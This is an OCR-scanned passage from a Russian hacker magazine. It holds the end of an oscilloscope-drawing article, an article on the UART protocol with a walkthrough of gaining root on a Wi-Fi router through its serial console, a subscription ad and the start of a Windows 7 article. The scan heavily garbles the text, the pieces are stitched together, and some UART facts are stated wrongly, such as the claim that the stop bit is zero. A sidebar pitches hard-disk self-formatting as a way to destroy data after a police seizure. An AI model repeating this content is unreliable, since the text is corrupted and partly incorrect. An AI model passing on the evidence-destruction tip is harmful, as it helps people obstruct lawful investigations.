Очень скоро от простых трехбуквен- 
ных надписей ты перейдешь к более 
живописным сюжетам. Одну та кую 
образцовую картинку я выложу на 
диск — делай с ней, что хочешь. 
После выполнения приведенного 
там скрипта у тебя должен создаться 



звуковой файл, который можно про- 
играть на осциллографе. А в данный 
моментя ваяю МаіЬсасІ-скрипт, 
который будет имитировать игру в 
настольный теннис. Уж не знаю по- 
чему, но маткад я полюбил больше, 
чем питон. 




> СІѴСІ 

На диске тебя ждет 
сочный фото- и ви- 
деоархив по каждому 
пункту. Также ищи там 
часть материала, 
не вошедшую в ста- 
тью по техническим 
причинам. 



не заботливый Виндоус, который останавливает мышку 
на границе экрана — здесь, напротив, все сурово, как и 
должно быть. Атеперь попробуем померить какой-ни- 
будь высокочастотный ток, например, то, что ты сейчас 
слушаешь — смело подрубай свой плеер к осциллографу! 
Если ты покрутишь ручку «время дел\ііте біѵ», то можешь 
масштабировать изображение по оси X. Это необходимо 
для работы с сигналами различных частот. 

Есть также замечательный режим синхронизации, то есть 
«по команде». Здесь все просто. Если ты на синхровход 
осциллографа подашь ступенчатый сигнал, то осцилло- 
граф начнет прорисовывать создаваемую им по умол- 
чанию прямую — снова и снова при каждом получении 
такого сигнала. Аналогично это работает на генераторе 
функций; мегаполезные гнезда позволяют делатьтакие 
крутые штуки, как отслеживание сигнала, выделение 
определенных частей сигналов и цифровое управление 
развертками. 

Ну и последний, редко используемый режим — это режим 
развертки по ХУ. Если у тебя осциллограф 2-канальный, 
то, скорее всего, ты являешься счастливым обладателем 
этого режима. Тут осциллограф использует два канала и 
по умолчанию отображает на экране не прямую, а точку. 
Кстати, старайся не светить слишком ярким лучом в одну 
точку — потому что слой с обратной стороны кинескопа 
может обгореть. Допустим, если ты подашь на «канал 
А» напряжение в 3 вольта, то лучик должен сместиться 
вправо, а если ты подашь те же 3 вольта на второй канал, 
то лучик поднимется вверх на 3 вольта. Если ты будешь 
подавать синусоидоидальные токи на оба канала, то 
получишь так называемые «фигуры Л и ссажу»... впрочем, 
о нихты и сам можешь прочесть на страницах Википедии, 
поэтому приступим копытам. 

в СДЕЛАЕМ ЭТО ПО-БЫСТРОМУ 

Сейчас мы рассмотрим наиболее простую реализацию 
задуманного — именно то, что я и сделал в тот вечер. Я 
взял раздолбанный ѴСА-кабель и «починил» его кусач- 
ками. Откушенный разъем с прощальным звоном улетел в 
мусорную корзину. Из кармана я достал транзистор. Даже 
не утруждая себя чтением маркировки, я начал быстро 
прозванивать его, чтобы узнать, где какой вывод. Забегая 
вперед, скажу, что нам абсолютно пофигу, какой транзис- 
тор брать. На диске ты найдешь схемы подключения для 
любого хлама, который мог заваляться у тебя в ящике. 
Даже полевые транзисторы — и те вариант (не говоря уже 
обиополярных, рпри прп типов]. Теперь шустро под- 
готовим аппаратуру для опытов. Напомню, что в нашем 



распоряжении должны быть генератор функций и любой 
осциллограф, который имел бы синхровход и 2-вход. 
Также нелишним будет какой-нибудь комп, в котором бы 
стояла ненужная (на всякий случай] видеокарта. Когда 
я изловчился делать этотфинтс осциллографом, я уже, 
совсем не боясь, подключал его к ноутбуку товарища 
— так, для прикола. Но первое время лучше, все же, не 
рисковать. Итак, выход генератора функций подключай 
на входной канал осциллографа. Приготовь кабель от 
2-входа осциллографа — воткни его и выведи крокодилы 
ксебе поближе. 

Доставай самую нужную деталь — транзистор. Я быстро 
подключил его к 9-вольтовому блоку питания, который 
воткнул в розетку. В принципе, ты с легкостью можешь 
использовать и компьютерный блок питания, но мне 
было не до этого. Каждая секунда была на счету. Теперь 
подключим транзистор. Для этого заранее советую при- 
готовить что-то типа шпаргалки, на которой карандашом 
накарябаны буковки «К», «Б», «Э» — для коллектора, 
базы и эмиттера, соответственно. На эмиттер я подвесил 
центральный провод от 2 -входа осциллографа и +9Ѵ. К 
коллектору подключил землю, ну а сам сигнал с интере- 
сующего меня зеленого провода я подал на базу. Немного 

«ЕСЛИ ТЫ НАСИНХРОВХОД 
ПОДАШЬ СТУПЕНЧАТЫЙ 
СИГНАЛ ДО ОСЦИЛЛОГРАФ 
НАЧНЕТ ПРОРИСОВЫВАТЬ 
СОЗДАВАЕМУЮ ИМ ПО 
УМОЛЧАНИЮ ПРЯМУЮ— 
СНОВА И СНОВА, ПРИ КАЖ- 
ДОМ ПОЛУЧЕНИИ ТАКОГО 
СИГНАЛА». 



покрутив ручки на осциллографе, я допер, что транзистор 
открыт, а, следовательно, — на экране мы постоянно 
видим зеленый квадрат без темных областей. Мне это не 
понравилось, и я решил хоть как-то снизитьтокуправле- 
ния. Я посмотрел на сгоревшую плату от монитора, откуда 
спустя мгновенье с хрустом выломал первое попавшееся 
сопротивление. Как только этот последний элемент был 
найден, на осциллографе явно начало выдаваться что-то 
похожее на темные области. Впрочем, ты и темных об- 
ластей не увидишь, просто характерные бегущие помехи. 
Если их сопоставить в столбик, то получится картинка. 
Просто, не правда ли? Две детали, немного проводов и 
все готово. 

г УПРОСТИМ ТЕХНОЛОГИЮ 
ДО БЕЗОБРАЗИЯ 

Допустим, ты не имеешь ни возможности, ни желания 
паять видеокарту, а вот сделать свое маленькое чудо тебе 
хочется. ОК, — не вопрос, читай дальше. Тебе потребуется 
3.5 мм разъем, каку обычных наушников, и какой-нибудь 
трЗ-плеер, умеющий проигрывать ѵѵаѵ-файлы. На диске 
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есть пробный образец — если проиграть его на осциллографе, то 
он покажет небольшое трехмерное демо-шоу с фигурами Л иссажу. 
Тебе лишь потребуется записать звук в мпЗ, воткнуть в разобранный 
штекер и щупами присоединиться к массе и каналам наушников. 
Включенный в режим развертки ХУ осциллограф тотчас начнет рисо- 
вать дивной красоты картинки, которые однозначно приблизяттвоего 
препода по физике или электротехнике к посещению психиатра. 

Этого видео тебе, конечно, должно хватить надолго, но знай, что ты и 
сам вполне можешь осилить рисование на осциллографе. Для этого 
потребуются интерпретатор питона и программа Віепсіег. После уста- 
новки программы создай вертексное изображение и точками рисуй, 
какты хотел бы заставить бегать лучик осциллографа. 

в ДИАГНОЗ для ВЫЖИВШИХ 

Прочитав эту статью, ты уже сейчас можешь взять свой іроб или 
другой трЗ-плеер и пойти крушить мозги окружающим в вузах, 
лабораториях и школах, где стоят осциллографы. Я молчу про то, что 
на сделанное тобой обязательно сбегутся посмотреть все знакомые, 
подруги, да и просто товарищи. И пустьтолько попробуют наехать, 




ЗЕЛЕНЫЙ СИГНАЛ, ПРОШЕДШИЙ ЧЕРЕЗ ПОЛЕВИК 
— НЕ СРАЗУ ДО МЕНЯ ДОШЛО, ЧТО ОН ВСЕ ВРЕМЯ 
БЫЛ ЗАКРЫТ 



что тема, типа, неактуальна — если утебя получились все девайсы, 
считай, что теперьты в состоянии работать со сложными видеопрото- 
колами, а значит, ты спец. 

Ты познал силу видео-сигнала и в состоянии обойтись простой 
микросхемой для управления большим ЖК-дисплеем. Я более чем 
уверен, что кассовые аппараты, терминалы оплаты сотовой связи и 
банкоматы жить должны на подобных адаптерах. Им вообще не нужна 
такая крутая графика. 

Когда я бродил по Сети, то нашел один занимательный сайт, на кото- 
ром были показаны некоторые уже готовые схемы и решения, позво- 
ляющие рисовать на осциллографе все, что душе угодно. Отморозок, 
занимающийся реставрированием старинных радиоприемников, 
в качестве увлечения делает различные устройства, позволяющие 
управлять кинескопом. На его сайте я нашел якобы работающие 
схемы всевозможных часов, конвертеров и прочей стильной аппа- 
ратуры. В свою очередь, я попытался спаять упрощенный вариант, 
но видимо, где-то ошибся при спайке и запорол устройство. По- 
пробуй посмотреть эту стоящую ссылку по нашей теме: ЬирѴ/ѵѵѵѵѵѵ. 
еІесІгопіхапсітоге.сопп/ргоіесі/іпсІех.ЫппІ . т 




ПРОЗВОНИВ ТРАНЗИСТОР, Я ПРОСТАВИЛ БУКОВКИ РЕМОНТИРУЕМ НАШ МЕГАКАБЕЛЬ 

«К», «Б», «Э» 
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СЕРГЕЙ ДОЛИН 

/ ОЫИѴ.М.ІѴЕ.ІОШМІАІ..СОМ / 






ГЛАВНЫЙ 

ИНСТРУМЕНТ 

ФРИКЕРА 



Великий и могучий ІІАГСТ 

На стра н и иах т неоднократно упоминался протокол ІІАРТ, но мало 
кто знает, насколько это мощный хакерский инструмент. Он есть в 
большинстве устройств и с его помощью можно заставить работать 
девайс та к, как нам хочется. Интересно? 



г ОТ ТЕЛЕГРАФА К СОМ-ПОРТУ 

Протокол ІІАРТ (ІІпіѵегзаІ азупсЬгопоиз гесеіѵегАгапзппіиег) или, 
по-русски, УАПП (универсальный асинхронный приемопередат- 
чик] — старейший и самый распространенный на сегодняшний 
день физический протокол передачи данных. Наиболее известен из 
семейства ІІАРТ протокол Р5-232 (в народе — СОМ -порт, тот самый 
который стоитутебя в компе]. Это, наверное, самый древний ком- 
пьютерный интерфейс. Он дожил донашихднейине потерял своей 
актуальности. 

Надо сказать, что изначально интерфейс УАПП появился в США как 
средство для передачи телеграфных сообщений, и рабочих бит там 
было пять (как в азбуке Морзе]. Для передачи использовались ме- 
ханические устройства. Потом появились компьютеры, и коды А5СІІ, 
которые потребовали семь бит. В начале 60-х на смену пришла всем 
известная 8-битная таблица АСКИ, и тогда формат передачи стал 
занимать полноценный байт, плюс управляющие три бита. 

В 1 971 году, когда уже начался бум микросхем, Гордон Белл для 
компьютеров РБР фирмы ѴѴезІегп БідТаІ сделал микросхему ІЭАВТ 
ѴѴБ1 402 А. Примерно в начале 80-х фирмой ІМаГопаІ Зетісопсіисіог 
был создан чип 8520. В 90-е был придуман буфер к интерфейсу, что 
позволило передавать данные на более высоких скоростях. Этот 
интерфейс, не претерпев практически никаких изменений, дошел и 
до наших дней 

г ФИЗИКА ИНТЕРФЕЙСА 

Чтобы понять, что роднит и отличает разные ІЭАВТ-интерфейсы, 
разберем принцип работы самого популярного и любимого нами 
протокола Р5-232. Дотошно расписывать все тонкости его работы я не 
буду. Об этом написан ни один десяток мегабайт статей, и если ты уме- 
ешь пользоваться Гуглом, то без проблем найдешь всю необходимую 
информацию. Но основы я расскажу, благо, сними можно уже круто 
всем рулить, а всякие фишки используются очень редко. 



Основные рабочие линии у нас — РХБ и ТХБ, или просто РХ и ТХ. 
Передающая линия — ТХБ (Тгапзтіиеб ОаГа] , а порт РХБ (Ресеіѵеб 
Баіа] — принимающая. 

Эти линии СОМ-порта задействованы при передаче без аппаратного 
управления потоком данных. При аппаратном потоке задейство- 
ваны еще дополнительные интерфейсные линии ЮТЭ, РТ5 и пр.]. 
Выход передатчика ТХ соединен с входом приемника РХ и наоборот. 
Электрический принцип работы Р5-232 отличается от стандартной 
5-вольтовой ТТІ_. В этом протоколе логический нуль лежит от +3 до +12 
вольт, а единица от-3 до -12, соответственно. Промежуток от -3 до +3 
вольт считается зоной неопределенности. Учти, что все напряжения 
указаны относительно корпуса компьютера, или земли. Теперь, я ду- 
маю, ты понимаешь, зачем в компьютерном блоке питания существует 
сразу два напряжения: -12 и +12 вольт. Они были введены специаль- 
нодля работы СОМ-порта. 

Такая большая амплитуда рабочих напряжений, целых 24 вольта, 
нужна в первую очередь для помехоустойчивости линий связи. По 
стандарту, длина кабеля, по которому у нас бегают данные, может быть 
1 5 м. Хотя на практике люди умудрялись заставлять его работать даже 
на 25 м. 

Электрические параметры Р5-232 — это главная характеристика, 
которая отличает его от других протоколов семейства ЮАРТ. 
Следующие характеристики — формат посылки и скорость передачи 
данных — полностью применимы ко всем видам ЭАРТ и обеспечива- 
ют их совместимость через несложные схемы сопряжения. 
Стандартная посылка занимает 10 бит. Но правило это распростра- 
няется только на стандартные настройки СОМ-порта. В принципе, 
его можно перенастроить так, чтобы он даже интерфейс Опе-ѴѴіге 
понимал. В режиме простоя, когда по линии ничего не передается, 
она находится в состоянии логической единицы, или -12 вольт. Нача- 
ло передачи обозначают передачей стартового бита, который всегда 
равен нулю. Затем идет передача восьми бит данных. Завершает 
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ПРОВЕРКА РАБОТЫ — ЛОГЗАГРУЗКИ ШОХ В ПРО- 
ГРАММЕ МІШСОМ 




посылку бит четности и стоповый бит. Бит четности осуществля- 
ет проверку переданных данных. Стартовый бит говорит нам, что 
пересылка данных завершена. Надо отметить, что ЭТО Р- бит может 
занимать 1 , 1.5, и 2 бита. Не стоит думать, что это дробные биты, это 
число говориттолько о его длительности. Стоповый бит, как и старто- 
вый, равен нулю. 



н СКОРОСТЬ РАБОТЫ 

Даже если тебе раньше никогда не приходилось работать с СОМ-пор- 
том, по крайней мере, в модеметы должен знать номинальные скорости 
работы: 9600, 28800, 33600, 56000 и т.п. Сколько бит в секунду убегает из 
нашего порта? Вот смотри, допустим, скоростьу нас 9600 бит в секунду. 
Это означает, что передача одного бита будетзанимать 1/9600 секунды, 
а пересылка байта — 1 1/9600. И такая скорость для байта вернатолько 
в случае, если стоп-бит будетзанимать один бит. В случае, если он за- 
нимает два стоп-бита, то передача будет 1 2/9600. Это связано стем, что 
вместе с битами данных передаются еще специальные биты: старт, стоп 
и битчетности. Линейка скоростей СОМ-порта стандартизирована. Как 
правило, все устройства работают на трех стандартных скоростях: 9600, 
1 9200, 1 1 5200. Но возможны другие варианты, даже использование 
нестандартных скоростей или скорости, меняющейся во времени, — с 
этим я сталкивался при разборе полетов очередного устройства. 

в ТАКОЙ РАЗНЫЙ ПРОТОКОЛ 

Видов БАНТ существует великое множество. Я не буду перечислять 
их наименования, ибо, если ты владеешь английским, то сумеешь и 
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ЖЕСТКИХДИСКОВ 






Нетакдавно в прессе, втом числе, на 
страницах нашего журнала, пробега- 
ла информация о слетании прошивок 
ужестких дисков семейства Бедаіе. 
Но, оказывается, после краха жест- 
кого диска его можно восстановить. 

У многихжесткихдисков сущест- 
вует интерфейсный разъем ІІАРТ. 
Через него возможно залить свежую 
прошивку в контроллер винта и не 
потерять информацию на жестком 
диске. Мануал лежит на нашем БѴБ. 
У некоторых жестких дисков сущест- 



вуетаппаратное форматирование. 
Если помнишь мою статью о магнит- 
ном уничтожении данных, эта фича 
придется тебе по вкусу. Суть такова: 
если дать на хард такую команду и тут 
неожиданно рубанут питание, то винт 
будет доформатирован при следую- 
щем включении. Это означает, что, 
если ктебе налетели маски-шоу и 
забрали винт, — он доформатирует- 
ся ужеу них, при подаче питания, и 
недоброжелателям останется только 
жевать сопли. 




> СІѴСІ 



На диске тебя ждут 
два ролика, демонс- 
трирующие работу 
чудо-девайса. 
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— мой блог, где ты 
можешьувидеть раз- 
личные поделки. 



сам нагуглить. Но самые основные не отметить нельзя! На- 
помню, что главное отличие интерфейсов состоит в среде 
и способе передачи данных. Данные могут передаваться 
даже по оптоволокну. 

Второй по распространенности интерфейс после Н5-232 

— это Р5-485. Он является промышленным стандартом, 

и передача в нем осуществляется по витой паре, что дает 
ему неплохую помехоустойчивость и повышенную скорость 
передачи до 4 мегабит в секунду. Длина провода тут может 
достигать 1 км. Как правило, он используется на заводах 
для управления разными станками. 

Надо сказать, что ІРБА, или инфракрасная связь, кото- 
рая встроена в большинствотелефонов и КП К, тоже, по 
сути, является ІЧАНТом. Только данные передаются не 
по проводам, а с помощью инфракрасного излучения. В 
5МАВТ-картах (51 М, спутниковое тел ев идеи ье, банковские 
карты] —тех самыхустройствах, которые мечтает похачить 
каждый уважающий себя фрикер — тоже используется наш 
любимый ІЭАПТ. Правда, там полудуплексная передача дан- 
ных, и логика работы может быть 1, 8/3,3 и 5 вольт. Выглядит 
так, будто РХзапаян сТХна одном и на другом конце — в 
результате, один передает, другой в этот момент слушает, 
и наоборот. Это регламентировано стандартом смарт-карт. 
Так мы точно знаем, сколько байт пошлем, и сколько ответит 
карточка. Тема достойна отдельной статьи. В общем, запом- 
ни, ІІАРТ есть почти везде. 

в СОПРЯЖЕНИЕ ИНТЕРФЕЙСОВ 

Я уже глаза намозолил разными интерфейсами, но как 
с ними работать-то? Ну, с обычным Р5-232 понятно, а, 
допустим, с 5-вольтовым юартом как быть? Все просто: 
существуют различные готовые микросхемы — преоб- 
разователи. Как правило, в маркировке они содержат 
цифры «232». Увидел в схеме микруху с этими цифирями 

— будьуверен: скорее всего, это преобразователь. Через 
такие микросхемы с небольшим обвязом и сопрягаются 
все интерфейсы ІЭАРТ. Я не буду рассказывать о промыш- 
ленных интерфейсах, а скажу о тех преобразователях, 
которые интересуют нас в первую очередь. 

Самый известный преобразователь интерфейса — это 
микросхема, разработанная фирмой МАХІМ, которая и 
получила от нее часть своего названия (тах232). Для ее 



работы требуется четыре конденсатора от 0,1 микрофара- 
ды до 4 микрофарад и питание 5 вольт. Удивительно, что 
эта микросхема из 5 вольт генерирует отрицательное на- 
пряжение, чтобы сопрягать 5-вольтовый ІЭАВТ с П5-232. 
Существуют микросхемы сопряжения 115В с ІІАРТ, напри- 
мер, микросхема Іі232г1. В ІІЬипІи для этой микросхемы 
уже встроены драйвера. Для ѴѴі псіоѵѵз их придется качать 
с официального сайта. После установки драйверов в сис- 
теме появится виртуальный СОМ-порт, и с ним уже можно 
рулить различными устройствами. Советую не принимать 
эти микросхемы, как единственно возможные. Найдется 
громадное количество более дешевых и интересных 
аналогов, посему наседай на Гугл и поймешь, что мир 
ІЭАВТа — это круто! 

В целом, микросхемы стоят достаточно дорого и порой 
можно обойтись более сложными, более дешевыми схе- 
мами на паре транзисторов. 

н ЧТО НАМ ЭТО ДАЕТ? 

Какты понял, интерфейс ІІАРТ присутствует во многих 
устройствах, в которых стоит какой-либо процессор или 
контроллер. Я даже больше скажу: если там стоит контрол- 
лер, то юарт есть стопудово (только он не всегда может ис- 

«ИНТЕРФЕЙС ІМКТ ПРИ- 
СУТСТВУЕТ ВО МНОГИХ 
УСТРОЙСТВАХ, В КОТО- 
РЫХ СТОИТ КАКОЙ-ЛИБО 
ПРОЦЕССОР ИЛИ КОНТ- 
РОЛЛЕР. Я ДАЖЕ БОЛЬШЕ 
СКАЖУ: ЕСЛИ ТАМ СТОИТ 
КОНТРОЛЛЕР, ТО ЮАРТ 
ЕСТЬ СТОПУДОВО» 

пользоваться]. Как правило, по этому интерфейсу идет на- 
ладка и проверка работоспособности девайса. Зачастую 
производительумалчиваето наличии этого интерфейса в 
изделии, но найти его несложно: достаточно скачать ма- 
нуал на процессор и, где находится юарт, ты будешь знать. 
Послетого, какты получишь физический доступ кжеле- 
зяке по нашему интерфейсу, можно его настроить на свое 
усмотрение или даже заставить работать так, как надо 
тебе, а не какзадумал производитель. В общем, — выжать 
максимум возможностей из скромного девайса. Приме- 
ром послужат статьи 0 \ На На «Длинная рука контроля» р-И 
#107] и «Мобильное зло» рЕ#1 1 0]. Знание этого протоко- 
ла даеттакже возможность подслушать, что же творится 
в линиях обмена между различными процессорами, так 
как часто производители организуют целые юарт-сети в 
своем устройстве. В общем, применений много, главное — 
интуитивно понимать, какэто делать. 

в ХАЧ ИМ ТОЧКУ ДОСТУПА 

Намедни я намутил себе ѴѴі Рі - роутер ѴѴГ-520ОІЭ и, 
прочитав статью Зіер’а «І_еѵеІ-ир для точки доступа» ( т 
#106], успешно установил туда Ыпих. Ноуменя возник- 
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СОБРАННЫЙ И УСТАНОВЛЕННЫЙ ПРЕОБРАЗОВА- 
ТЕЛЬ ИНТЕРФЕЙСА 




ПОСЛЕДНИЕ ШТРИХИ — ЗАПАИВАЕМ РАЗЪЕМ 




ПРОПЛАВЛЯЕМ ОТВЕРСТИЕ ПОД ПРОВОД 




ПОЛНОЦЕННЫЙ ЛИНУКСОВЫЙ КОМП (СОСВОЕЙ 
АРХИТЕКТУРОЙ) 



ли проблемы с монтированием зѵѵар- раздела жесткого диска. Так 
появилась необходимость посмотреть лог загрузки точки доступа — 
подмонтировался раздел или нет — причем, как говорится, на лету, 
чтобы сразу вносить необходимые изменения. Шестым чувством я 
подозревал, что в моем роутере просто обязан быть ЧАРТ. Я взял в 
руки крестовую отвертку и начал его разбирать. Дело тривиальное, 
но с заковыркой — потайные винтики находятся под резиновыми 
ножками (если решишь повторить, помни, что при разборе ты лиша- 
ешься гарантии]. Моему взору предстала достаточно скучная плата, 
где все «сЫр-іп-опе»: один центральный процессор, в который 
включено все, внешняя оператива, флеша, преобразователь пита- 
ния и рядок разъемов с кнопками. Нона плате была не распаянная 
контактная площадка, точнее сказать, отверстия под иголки. Их было 
четыре штуки. Вот он ІЧАРТ, это очевидно! По плате даже без мульти- 
метра видно, что крайние иголки — это +3,3 вольта и второй — земля. 
Средние контакты, соответственно, РХ и ТХ. Какой из них что, легко 
устанавливается методом научного тыка (спалить интерфейс очень 
проблематично]. Сразу хочу отметить, что интерфейс ІІАРТ в каждом 
роутере выглядит по-разному. В большинстве случаев, это нераспа- 
янные отверстия на плате. Правда, в одном роутере от А51І5 я даже 
встретил полностью подписанный разъем. 

в СОБИРАЕМ ПРЕОБРАЗОВАТЕЛЬ 

Чтобы подключить роутер к компу, необходимо сопрячь интерфейсы 
Р5-232 с ІЧАРТом роутера. В принципе, можно подключить к 115В, 
используя указанную выше микросхему РТ232ВЦ — что я и сделал 
при первой проверке роутера. Но эта микросхема — в достаточно 



сложном для пайки корпусе, посему мы поговорим о более простых 
решениях. А именно — микросхеме МАХ232. Если ты собираешься 
питаться от роутера, то там, скорее всего, будет 3,3 вольта, поэтому 
лучше использовать МАХ3232, которая обычно стоит в КПК (схему 
распайки нетрудно найти в инете). Но в моем роутере присутствова- 
ло питание +5 вольт на входе, а указанных микросхем у меня великое 
множество, и я не стал заморачиваться. Для сборки нам потребуют- 
ся конденсаторы 0,1 мкФ (4 штуки] и сама микросхема. Запаиваем 
все по традиционной схеме, и начинаем эксперименты. 

На выход я сразу повесил 9-пинов ый разъем типа «папа», чтобы 
можно было легко подключить нуль-модемный кабель. Если ты 
помнишь, во времена 005а такими кабелями делали сетку из двух 
компов и резались в «Дюкнюкем». Провод для наших целей собрать 
несложно. Правда, получится не полный нуль-модем и через него 
особо не поиграешь, но рулить точкой доступа будет самое то! Тебе 
понадобятся два 9-пиновых разъема типа «мама», корпуса к ним и 
провод, например, от старой мышки или клавы (главное, чтобы в нем 
было три провода]. Сначала соединяем земли это пятый контакт 
разъемов; просто беремлюбой проводисобоих сторон припаиваем 
к 5-му контакту. А вот с РХ и ТХ надо поступить хитрее. С одного конца 
провода запаиваем на 3-й контакт, а с другого — на 2-й. Аналоги чнос 
третьим проводом, только с одного конца запаиваем на 2-й контакт, с 
другого — на 3-й. Суть в том, что ТХ должен передавать в РХ. Прячем 
запаянные разъемы в корпус — и готов нуль-модемный кабель! 

Для удобства монтажа в материнку роутера я впаял штырьковый 
разъем, а в монтажку с МАХ232 — обратный разъем и вставил платку, 
как в слот. РХ и ТХ роутера подбираются экспериментально. 
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ЛОГЗАГРУЗКИ ЛИНУКСА НАЭКРАНЕ КПК 



Теперь надо запитать микросхему преобразователя. Общий провод 
у нас присутствует уже прямо в разъеме на мамке роутера. А вот + 5 
вольт находится прямо у входа питания роутера, в месте, где подклю- 
чается адаптер. Точку нахождения 5 вольт определяем вольтметром, 
измеряя разные узлы относительно земли роутера. 

Подключаем питание. Включаем и начинаем наши злостные экспе- 
рименты. 

в НАСТРОЙ КА ТЕРМ И НАЛА 

Нам нужно настроить терминальную программу. В Винде вседоста- 
точно просто: запускаем НурегТегтіпаІ, отключаем программную и 
аппаратную проверку данных, выставляем скорость 1 1 5200 и один 
стоповый бит. А вот в Л инухе дело обстоит чуть хитрее. У меня ІІЬипІи, 
и рассказывать буду про нее. Для начала разберись, как в твоей 
сборке именуется СОМ-порт. В моем случае СОМ1 был Лу50 (если 
использовать к примеру микросхему РТ232, то он будет именоваться 
НуІІЗВО]. Для работы с ним я использовал софтинку тіпісот. 

Запускай ее с параметрами: тіпісот - I -8 -с оп -з . Далее выбирай 
«Настройки последовательного порта»: 

Последовательный порт /сІеѵ/ЦЦуЗО 
Скорость/четность/биты 115200 8Ы1 
Аппаратное управление потоком — нет 
Программное управление потоком - нет 

Сохраняем настройки. Софтина попробует проинициализировать 
модем — не обращай внимания. Чтобы вызвать меню, нажми <сМ-а 
г>. Там можно менять настройки, например: включить/выключить 
эхо — Е. 

в НАСТРОЙКА 

Я не рекомендую подключать микросхему преобразователя к роутеру, 
дабы проверить ее функционал. Допускается только брать с него 
питание. Проверка проходит очень просто — необходимо перемкнуть 
ПХ с ТХ. Сначала перемыкаешь в СОМ -порте 2-й и 3-й контакт — 
проверяешь настройки терм и нал ки. Пишешь что-то на клаве: если 
символы возвращаются, значит, все О К. Также проверяешь кабель, те 
же контакты. Потом подключаешь микросхему, и уже у нее на выходе 
ставишь перемычку. Я заостряю на этом внимание, потому что, напри- 
мер, уменя возникли проблемы, и ничего не работало, пока я все не 
проверил и не нашел ошибку. 

После всех настроек можешь смело цеплять к роутеру и искать ВХ-ТХ 
на роутере, периодически выдергивая из него питание. Если все 
сделано правильно, то при подаче питания ты увидишь лог загрузки 
роутера. Принимай поздравления, теперь утебя полный аппаратный 
рут, так, будто ты сидишь за монитором с клавой роутера. 



Тзгг им уиьли -Чіа -|-»«нилить. 



ТІ 


тз 


13 


Т2 


13 


тз 


13 


тз 

























* 1 7 



Передав бі ни Н 101101 

УСТРОЙСТВА, ИСПОЛЬЗУЮЩИЕ УАКТ 




СХЕМА СОПРЯЖЕНИЯ ИНТЕРФЕЙСОВ 



г АВТОНОМНОЕ ПЛАВАНЬЕ 

Согласись, делать через терминальную программу то же самое, 
что удобнее сделать через 55Н — не айс. Мне хотелось превратить 
роутер в автономный Еіпих-компьютер, со своей хитрой архитекту- 
рой. Для этого нужно, чтобы данные с клавиатуры передавались по 
ІЧАЕТ, и по немуже выводились на монитор. Паять и разрабатывать 
устройство было лениво. Тогда-то и пришла идея за юзать для этих 
целей пылящийся без дела КПК. 

По сути, наладонник будет исполнять роль контроллера клавиатуры и 
дисплея, ну и служить сопряжением интерфейсов. Сначала я попро- 
бовал древнейший Раіт ті 00. Но, видимо, у него очень маленькая 
буферная память, и от количества данных, которые идут с роутера, ему 
становилось плохо. Я взял другой — промышленный КПК, с нормаль- 
ным СОМ-портом и терминалкой. 

Подключил, вставил в доки, в результате, получил небольшой линукс - 
компьютер. В принципе, вместо дорогущего промышленного КПК 
подойдет большинство наладонников, работающих под операцион- 
кой ѴѴіпСЕ, главное — найти подходящий терминальный софт. 

в итоги 

Итак, я показал небольшой пример использования ІЧАРТ. Если ты 
вкуришь в этот протокол, то поверь, станешь просто повелителем 
различных железок. Есть он практически везде, и через него можно 
сопрягать, казалось бы, совершенно разные вещи. К примеру, к то му 
же роутеру при небольших настройках подключается мобильный 
телефон по юарту, — и раздает с него интернет. В общем, применений 
куча. Не бойся экспериментировать, самообразовываться и реализо- 
вать свои идеи. Удачи, хаіікер. т 
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Подписка на журнал «ХАКЕР+ОѴР» на 6 месяцев 
стоит 1200 руб. 



По всем вогтоосам 




ГОДОВАЯ ПОДПИСКА ПО ЦЕНЕ 

2100 руб. (на 15% дешевле чем 
при покупке в розницу) 



Единая цена по всей России. Доставка за счет издателя, 
в том числе курьером по Москве в пределах МКАД 



ВНИМАНИЕ! 

ВТОРОЕ СПЕЦПРЕДЛОЖЕНИЕ! 

При подписке на комплект журналов 

ЖЕЛЕЗО + ХАКЕР + ОШ 

- Один номер всего за 1 55 рублей (на 25% дешевле, чем в розницу) 

ЗА 12 МЕСЯЦЕВ ЗА 6 МЕСЯЦЕВ 



ВЫГОДА • ГАРАНТИЯ • СЕРВИС 

КАК ОФОРМИТЬ ЗАКАЗ 

1. Разборчиво заполните подписной купон и квитанцию, вырезав 
их из журнала, сделав ксерокопию или распечатав с сайта ѵѵѵѵѵѵ. 
діс.ги. 

2. Оплатите подписку через Сбербанк . 

3. Вышлите в редакцию копию подписных документов — купона и 
квитанции — любым из нижеперечисленных способов: 

• по электронной почте $иЬ$сгіЬе@дІс.ги; 
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Мпсіоѵѵб 7 глазами І Т - сп е циалиста 



ѴѴіпсІоѵѵз 7 задолго до появления первых сборок вызвала огромный 
интерес среди ІТ-специалистов и простых пользователей. И хотя ар- 
хитектура, построенная на коде Ѵізііа и ѴѴіп2к8, осталась, в общем, 
неизменной, в «семерке» и сопутствующих инструментах сделано ряд 
действительно полезныхусовершенствований. Они позволятадми- 
нистратору получить легкоуправляемую и безопасную систему. 



ИНСТРУМЕНТЫ РАЗВЕРТЫВАНИЯ 

Прежде всего, произошли изменения в инстру- 
ментах для сборки системы. Самым заметным 
стало включение средства миграции пользо- 
вательской среды ЕГЗМТ (Изег Згаге Мі§гаГіоп 
Тооі) в состав ѴѴіпсІоѵѵз АІК (ѴѴіпсІоѵѵз АиГотаГесі 
Іпзгаііагіоп Кіг, Пакет автоматической установки 
ѴѴіпсІоѵѵз) . Предназначено оно для быстрого 
переноса файлов, настроек ОС и приложений, а 
также параметров пользователей при масштаб- 
ном развертывании ОС от МісгозоЙ. 

Версия ШМТ 4.0 получила ряд новых возмож- 
ностей. Теперь кутилитам ЗсапЗгаГе (сбор фай- 
лов и параметров) и ЬоасІЗгаГе (перенос данных) 
добавлена новая — ІІзтШШз — их дополняю- 
щая. ІІзтШіііІз обладает всего двумя парамет- 
рами. При помощи /ес можно получить список 
поддерживаемых алгоритмов шифрования 
(А1§Шз) в текущей системе. А /б удаляет ссьшку 
на каталог, используемый в аргументе команды, 
из базы, сформированной ЗсапЗгаГе. Последнее 
полезно при удалении жестких ссылок, забло- 
кированных по разным причинам. Нужная ин- 
формация для ЗсапЗгаге/ЬоасІЗгаге по-прежнему 
находится в нескольких ХМЬ-файл ах переноса: 
Мі^Арр.хті, Мі^ІІзег.хтІ, Мі$Д>ос5.хті, Сопй§. 
хті (создается при помощи /§епсопй§) . 

Теперь при переносе учетной записи не тре- 
буется обязательное подключение к домену, 



ЗсапЗгаГе способен производить сбор данных из 
неработающей системы (например, используя 
ѴѴіпсІоѵѵз РЕ) и более точно определять требуе- 
мый для миграции размер раздела и время. 

В сценарии Сопй^.хті появились новые 
параметры и секции. Например, секция 
